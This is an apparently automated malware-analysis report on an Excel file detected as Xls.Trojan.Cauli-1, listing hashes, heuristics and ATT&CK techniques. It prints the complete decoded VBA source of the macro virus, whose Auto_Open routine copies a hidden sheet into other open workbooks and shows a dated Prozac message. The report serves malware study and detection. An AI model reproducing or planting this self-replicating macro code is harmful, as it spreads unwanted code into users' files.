Xls.Trojan.Cauli-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 7270111d3cfd4bae…

MALICIOUS

Office (OLE)

25.0 KB Created: 1998-09-04 16:45:33 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: ea23f88dc4d69cd5620d1c1a67a12738 SHA-1: 773f30619e48498a1086243d9bbd005c38728d23 SHA-256: 7270111d3cfd4bae60da4acb83136c2d3e521f907a0f849d76b84af35452cac2
220 Risk Score

Malware Insights

Xls.Trojan.Cauli-1 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature Xls.Trojan.Cauli-1. It contains VBA macros, specifically an Auto_Open subroutine, which is designed to infect other workbooks by copying its own sheet. The macro also checks the current date against a deadline and may display a message about depression and Prozac, suggesting a social engineering or distraction element.

Heuristics 4

  • ClamAV: Xls.Trojan.Cauli-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Cauli-1
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1273 bytes
SHA-256: 290ddffd088da786d3116f20dfa364f79c56b6f2e72159032a34bc2f3e6b80c7
Detection
ClamAV: Xls.Trojan.Cauli-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "cauliflower"






Option Private Module

Private Const deadline = 36161 '01/01/1999

Sub Auto_Open()
    On Error GoTo finish
    Application.ScreenUpdating = False
    For Each wb In Workbooks
        If Not wb.Saved Then
            infect = True
            For Each mdl In wb.Modules
                If mdl.Name = "cauliflower" Then
                    infect = False
                    Exit For
                End If
            Next
            If infect Then
' ***           MULTIPLYING SUBROUTINE STARTS HERE
                ThisWorkbook.Sheets("cauliflower").Copy before:=wb.Sheets(1)
                ActiveWindow.SelectedSheets.Visible = False
' ***           MULTIPLYING SUBROUTINE ENDS HERE
            End If
        End If
    Next
    If DateValue(Date) >= deadline Then
'***    THE "FUNNY MESSAGE" SUBROUTINE STARTS HERE
        answer = MsgBox("Are you depressed", vbYesNo, "LILLY RESCUE MISSION")
        If answer = vbYes Then
            MsgBox ("Depression hurts. PROZAC can help.")
        End If
'***    THE "FUNNY MESSAGE" SUBROUTINE ENDS HERE
    End If
finish:
    ThisWorkbook.Activate
    Application.ScreenUpdating = True
End Sub

Sub Auto_Close()
    Auto_Open
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.